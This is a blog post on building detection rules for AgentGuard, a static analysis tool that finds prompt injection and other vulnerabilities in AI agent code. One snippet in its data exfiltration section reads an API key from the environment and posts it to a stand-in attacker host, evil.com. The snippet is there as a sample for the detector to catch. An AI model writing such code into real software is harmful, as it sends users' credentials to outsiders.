# Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

> Source: <https://dev.to/dockfixlabs/beyond-regex-building-detection-rules-for-ai-agent-vulnerabilities-hi3>
> Published: 2026-06-28 22:45:51+00:00

When I started building [AgentGuard](https://github.com/dockfixlabs/agentguard), the first question was: how do you detect a prompt injection vulnerability in source code?

Unlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It's a pattern of **untrusted data flowing into LLM context**. The vulnerability isn't in a function call -- it's in how data is constructed.

Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:

```python
import re

# ASI01: Prompt Injection
# Flags an f-string with interpolation assigned to a prompt-like name.
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I
)
```

This catches the most common pattern: an f-string interpolated directly into a prompt-like variable. It is blunt but effective. The rule cannot tell whether the interpolated value is actually user-controlled, yet in a scan of 50 open-source agent codebases, this single rule found 127 instances.
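To make the rule concrete, here is a minimal sketch of how such a pattern could be applied line by line. The `scan_source` helper and the sample snippet are illustrative assumptions, not AgentGuard's actual scanner.

```python
import re

# Same pattern as the rule above.
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,
)


def scan_source(source: str) -> list[tuple[int, str]]:
    """Return (line_number, stripped_line) for every line the rule flags.

    Hypothetical helper for illustration only.
    """
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if FSTRING_INJECTION.search(line):
            findings.append((lineno, line.strip()))
    return findings


sample = '''
user_input = input()
prompt = f"You are a helper. {user_input}"
greeting = f"Hello {name}"
'''

findings = scan_source(sample)
for lineno, line in findings:
    print(f"line {lineno}: {line}")
```

Only the `prompt = f"..."` line is reported. The `greeting` f-string is ignored because its target name is not prompt-like, which is both the strength and the weakness of a name-based rule.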

Regex has limits. Consider:

```python
# Pattern A: Obvious
prompt = f"You are a helper. {user_input}"

# Pattern B: Subtle
template = "You are a helper. {input}"
prompt = template.format(input=user_data)

# Pattern C: Hidden
messages = [{"role": "system", "content": config["system_prompt"] + user_message}]
```

Pattern A is trivial to detect. Pattern B requires understanding `.format()` semantics. Pattern C requires tracking data flow through dictionaries and list construction.
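The gap is easy to check directly. The sketch below runs the f-string rule against the three patterns; the `patterns` dictionary is just a test harness assumed for this example.

```python
import re

FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,
)

# The three patterns from above, stored as source text.
patterns = {
    "A": 'prompt = f"You are a helper. {user_input}"',
    "B": (
        'template = "You are a helper. {input}"\n'
        'prompt = template.format(input=user_data)'
    ),
    "C": (
        'messages = [{"role": "system", '
        '"content": config["system_prompt"] + user_message}]'
    ),
}

# A pattern counts as detected if any of its lines matches the rule.
results = {
    name: any(FSTRING_INJECTION.search(line) for line in code.splitlines())
    for name, code in patterns.items()
}
print(results)  # {'A': True, 'B': False, 'C': False}
```

Patterns B and C carry the same risk as A, but neither contains an f-string assigned to a prompt-like name, so the rule stays silent.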

This is where AgentGuard is headed next: **AST-based semantic analysis**.

The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:

- **Sources:** `user_input`, `query`, `message`, `request.body`
- **Sinks:** `openai.chat.completions.create`, `prompt`, `messages`, `system`

This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.
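A rough idea of what this could look like with Python's standard `ast` module is sketched below. It is not AgentGuard's implementation: the `TaintVisitor` class and `find_taint` helper are hypothetical, the source set adds `user_data` and `user_message` (from Patterns B and C) to the names listed above, and the analysis is deliberately naive. It walks statements in source order, ignores branches and function boundaries, and matches the sink call by suffix.

```python
import ast

# Assumed taint sources: the names listed above plus the variables
# used in Patterns B and C.
SOURCES = {"user_input", "query", "message", "request.body",
           "user_data", "user_message"}
# Assumed sinks: prompt-like variable names and the chat completion call.
SINK_NAMES = {"prompt", "messages", "system"}
SINK_CALL_SUFFIX = "chat.completions.create"


class TaintVisitor(ast.NodeVisitor):
    """Naive, flow-insensitive taint tracker (illustrative only)."""

    def __init__(self) -> None:
        self.tainted = set(SOURCES)
        self.findings: list[tuple[int, str]] = []

    def _is_tainted(self, node: ast.AST) -> bool:
        # An expression is tainted if any name or dotted attribute
        # inside it is currently in the tainted set.
        for child in ast.walk(node):
            if isinstance(child, ast.Name) and child.id in self.tainted:
                return True
            if isinstance(child, ast.Attribute) and ast.unparse(child) in self.tainted:
                return True
        return False

    def visit_Assign(self, node: ast.Assign) -> None:
        if self._is_tainted(node.value):
            for target in node.targets:
                if isinstance(target, ast.Name):
                    self.tainted.add(target.id)  # propagate taint
                    if target.id in SINK_NAMES:
                        self.findings.append((node.lineno, target.id))
        self.generic_visit(node)

    def visit_Call(self, node: ast.Call) -> None:
        if ast.unparse(node.func).endswith(SINK_CALL_SUFFIX):
            args = list(node.args) + [kw.value for kw in node.keywords]
            if any(self._is_tainted(arg) for arg in args):
                self.findings.append((node.lineno, SINK_CALL_SUFFIX))
        self.generic_visit(node)


def find_taint(source: str) -> list[tuple[int, str]]:
    visitor = TaintVisitor()
    visitor.visit(ast.parse(source))
    return visitor.findings


pattern_b = '''
template = "You are a helper. {input}"
prompt = template.format(input=user_data)
'''
pattern_c = (
    'messages = [{"role": "system", '
    '"content": config["system_prompt"] + user_message}]'
)

print(find_taint(pattern_b))  # [(3, 'prompt')]
print(find_taint(pattern_c))  # [(1, 'messages')]
```

Both patterns that the regex missed are flagged here, because the visitor looks at what flows into the assignment rather than how the string literal is spelled. A production analysis would also need scoping, sanitizer handling, and inter-procedural flow, which this sketch omits.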

AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):

```python
import os
import requests

api_key = os.environ.get("API_KEY")  # line N: secret access
requests.post("https://evil.com/collect", headers={"Auth": api_key})  # line N+1: network call
```

The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.
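The adjacent-line check can be sketched in a few lines. The two regexes and the `correlate` function below are hypothetical stand-ins chosen for this example; AgentGuard's actual ASI03 patterns may differ.

```python
import re

# Hypothetical patterns for illustration only.
SECRET_ACCESS = re.compile(r'os\.environ(?:\.get\(|\[)|os\.getenv\(')
NETWORK_CALL = re.compile(r'requests\.(?:post|put|get)\(|urllib\.request\.urlopen\(')


def correlate(source: str) -> list[int]:
    """Return 1-indexed line numbers N where line N reads a secret
    and line N+1 makes a network call."""
    lines = source.splitlines()
    hits = []
    for i in range(len(lines) - 1):
        if SECRET_ACCESS.search(lines[i]) and NETWORK_CALL.search(lines[i + 1]):
            hits.append(i + 1)
    return hits


adjacent = (
    'api_key = os.environ.get("API_KEY")\n'
    'requests.post("https://evil.com/collect", headers={"Auth": api_key})\n'
)
# Same code with one blank line inserted between the two statements.
spaced = adjacent.replace("\n", "\n\n", 1)

print(correlate(adjacent))  # [1]
print(correlate(spaced))    # []
```

In this sketch a single blank line between the two statements is enough to break the correlation, which illustrates why a strict N and N+1 check is only a first step toward tracking where the secret actually flows.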

Future versions will extend this to full function-level taint tracking.

AgentGuard currently has rules for all 10 ASI categories:

| ASI | Rule | Detection Method |
|---|---|---|
| ASI01 | Prompt Injection | Regex (f-string, concat, format) |
| ASI02 | Tool Abuse | Regex (os.system, subprocess, eval) |
| ASI03 | Data Exfiltration | Regex + cross-line correlation |
| ASI04 | Excessive Agency | Regex (auto-execute, no-confirm) |
| ASI05 | Supply Chain | Regex (untrusted pip install, dynamic import) |
| ASI06 | Insecure Output | Regex (raw HTML, eval output) |
| ASI07 | Credential Exposure | Regex (API keys, private keys, passwords) |
| ASI08 | Context Manipulation | Regex (context stuffing, token bombing) |
| ASI09 | Agent Loop Exploitation | Regex (recursive calls, no depth limit) |
| ASI10 | Trust Boundary | Regex (mixed privilege, cross-agent calls) |

The [benchmark suite](https://github.com/dockfixlabs/agentguard-benchmark) has 28 samples.

The long-term goal is simple: **make AI agent code as auditable as web application code**. We have Semgrep for web apps. We need AgentGuard for agent apps.

[AgentGuard](https://github.com/dockfixlabs/agentguard) is MIT-licensed and open source. Install with `pip install dfx-agentguard`.
